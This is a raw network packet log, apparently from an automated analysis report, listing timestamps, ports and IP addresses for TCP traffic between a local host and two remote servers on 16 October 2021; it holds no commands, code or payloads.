Oct 16, 2021 16:53:26.526137114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526139021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526151896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526168108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526169062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526217937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526233912 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.564929962 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.564956903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565010071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565037966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565088034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565108061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565124989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565134048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565140963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565155029 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565156937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565172911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565176010 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565187931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565203905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565203905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565218925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565238953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565241098 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565256119 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565263033 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565270901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565282106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565287113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565304041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565318108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565318108 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565335035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565350056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565351963 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565368891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565387011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565402031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565418959 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565426111 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565431118 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565433979 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565448999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565454006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565457106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565459013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565464973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565480947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565495014 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565500975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565511942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565519094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565534115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565542936 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565550089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565565109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565581083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565596104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565609932 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565612078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565615892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565618992 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565630913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565696001 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565701962 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565762997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565778971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565798044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565814972 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565829992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565841913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565845966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565855026 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565857887 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565861940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565877914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565893888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565903902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565907955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565923929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565937996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565941095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565956116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565965891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.565972090 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565988064 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.565998077 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566004038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566020012 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566035032 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566041946 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566047907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566055059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566071033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566086054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566087008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566097021 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566102028 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566116095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.566133022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.566162109 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.012855053 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.052541971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052691936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052763939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052822113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052866936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052911997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.052968025 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.052983046 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.052984953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.052985907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053035021 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053071976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053078890 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053081989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053129911 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053147078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053193092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053230047 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053235054 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053241014 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053284883 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053284883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053349018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053391933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053441048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053483963 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053488016 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053508043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053579092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053618908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053651094 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053659916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053663969 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053668022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053702116 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053739071 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053741932 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053744078 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053781986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053823948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053828955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053836107 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053862095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053895950 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053905964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053908110 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.053949118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.053989887 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.054022074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054029942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054029942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.054033995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054073095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054074049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.054111004 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.054147005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054151058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.054151058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.054366112 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.093820095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093863010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093893051 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093924999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093943119 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093962908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093983889 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.093991995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094003916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094014883 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094019890 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094023943 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094029903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094053030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094074011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094090939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094095945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094098091 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094100952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094116926 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094142914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094161034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094182968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094193935 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094203949 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094204903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094227076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094249010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094266891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094284058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094302893 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094341040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094342947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094364882 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094393015 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094399929 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094399929 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094423056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094444990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094455957 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094461918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094470978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094494104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094496965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094502926 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094510078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094527960 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094552040 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094573975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:27.094583988 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094588995 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094628096 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:27.094634056 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.219660044 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.219818115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.258996010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.259042978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.259196997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.259211063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.259212971 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.259293079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.259336948 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.259360075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.298516035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.298619986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.298635960 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.298698902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.298719883 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.298877954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338310957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338335037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338351965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338371992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338387966 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338398933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338426113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.338500023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.567069054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:36.567259073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:36.720895052 CEST	49751	80	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.737059116 CEST	80	49751	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:36.737191916 CEST	49751	80	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.738838911 CEST	49751	80	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.754892111 CEST	80	49751	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:36.773227930 CEST	80	49751	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:36.773515940 CEST	49751	80	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.975439072 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.975492954 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:36.975708961 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.977062941 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:36.977096081 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.021955013 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.022115946 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.046571016 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.046603918 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.046964884 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.048069954 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.051521063 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094156027 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094239950 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094260931 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094281912 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094285011 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094312906 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094338894 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094472885 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094482899 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094492912 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094530106 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094540119 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094563961 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094567060 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094577074 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094608068 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094609022 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094643116 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094654083 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.094693899 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.094728947 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.095660925 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.095736980 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.095773935 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.095843077 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.095863104 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.095922947 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.095957041 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.096314907 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.096389055 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.096429110 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.096429110 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.096446037 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.096461058 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.096549988 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.096559048 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.096625090 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.097187042 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.097251892 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.097285986 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.097290993 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.097306967 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.097316027 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.097362995 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110337973 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110435009 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110459089 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110474110 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110488892 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110512972 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110551119 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110574961 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110601902 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110624075 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110660076 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110666037 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110702991 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110703945 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110717058 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.110754013 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.110779047 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.111387968 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.111468077 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.111481905 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.111502886 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.111529112 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.111574888 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.111583948 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.111646891 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:37.112129927 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.112205029 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:37.112220049 CEST	49752	443	192.168.2.7	162.159.130.233
